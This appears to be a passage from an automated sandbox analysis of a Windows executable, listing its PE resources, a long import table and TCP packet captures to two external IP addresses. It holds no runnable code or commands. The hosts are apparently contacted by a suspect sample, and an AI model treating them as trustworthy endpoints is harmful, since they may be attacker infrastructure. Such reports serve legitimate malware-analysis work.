                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xcc7b80x56c05data1.0003264543400134
                                                                                  RT_GROUP_ICON0x1233c00x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x1234380x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x12344c0x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x1234600x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x1234740xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x1235500x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                  Imports

                                                                                  DLLImport
                                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain

                                                                                  Network Behavior

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 15, 2024 06:45:33.767952919 CET4916180192.168.2.2276.223.54.146
                                                                                  Nov 15, 2024 06:45:33.775388002 CET804916176.223.54.146192.168.2.22
                                                                                  Nov 15, 2024 06:45:33.775455952 CET4916180192.168.2.2276.223.54.146
                                                                                  Nov 15, 2024 06:45:33.784399033 CET4916180192.168.2.2276.223.54.146
                                                                                  Nov 15, 2024 06:45:33.789350986 CET804916176.223.54.146192.168.2.22
                                                                                  Nov 15, 2024 06:45:34.427803040 CET804916176.223.54.146192.168.2.22
                                                                                  Nov 15, 2024 06:45:34.460372925 CET804916176.223.54.146192.168.2.22
                                                                                  Nov 15, 2024 06:45:34.460560083 CET4916180192.168.2.2276.223.54.146
                                                                                  Nov 15, 2024 06:45:34.461904049 CET4916180192.168.2.2276.223.54.146
                                                                                  Nov 15, 2024 06:45:34.466758013 CET804916176.223.54.146192.168.2.22
                                                                                  Nov 15, 2024 06:45:39.413821936 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:39.421813011 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:39.421964884 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:39.422689915 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:39.430167913 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055100918 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055126905 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055147886 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055161953 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055243015 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055260897 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055272102 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055277109 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055272102 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055273056 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055273056 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055294037 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055310011 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055391073 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.055406094 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055406094 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055406094 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055406094 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055407047 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.055448055 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.060332060 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.060518026 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.060714960 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.060738087 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.060755014 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.060859919 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.060859919 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.060859919 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.082484961 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179680109 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179716110 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179734945 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179749966 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179766893 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179783106 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179800987 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179816008 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.179886103 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179886103 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179886103 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179886103 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179887056 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179887056 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179887056 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.179887056 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180167913 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180217028 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180234909 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180238962 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180250883 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180258036 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180269003 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180279016 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180299044 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180319071 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180860996 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180915117 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180915117 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180932045 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.180958033 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.180984020 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.181025028 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.181041002 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.181062937 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.181090117 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.181629896 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.181689024 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.181690931 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.181705952 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.181736946 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.181768894 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.221524954 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.221549988 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.221569061 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.221575975 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.221587896 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.221625090 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.221625090 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.221647024 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303639889 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303715944 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303739071 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303744078 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303761005 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303771019 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303776979 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303781986 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303795099 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303795099 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303812027 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303824902 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303884029 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.303920031 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.303993940 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304028988 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304053068 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304069996 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304090023 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304101944 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304193020 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304209948 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304228067 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304240942 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304296017 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304328918 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304658890 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304693937 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304723024 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304740906 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304759026 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304771900 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304861069 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304877043 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304893970 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.304894924 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304918051 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.304929018 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305031061 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305067062 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305636883 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305674076 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305676937 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305692911 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305712938 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305726051 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305821896 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305839062 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305855989 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305857897 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305872917 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305872917 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.305891037 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.305902004 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306488991 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306526899 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306556940 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306572914 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306595087 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306608915 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306735992 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306751966 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306773901 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306780100 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306787014 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306796074 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.306824923 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306844950 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306844950 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.306910038 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.307423115 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.307466030 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.307502985 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.307519913 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.307538986 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.307554960 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.345563889 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345598936 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345627069 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345642090 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345659018 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345676899 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345694065 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345711946 CET804916245.33.6.223192.168.2.22
                                                                                  Nov 15, 2024 06:45:40.345732927 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.345732927 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.345732927 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.345732927 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.345732927 CET4916280192.168.2.2245.33.6.223
                                                                                  Nov 15, 2024 06:45:40.345732927 CET4916280192.168.2.2245.33.6.223
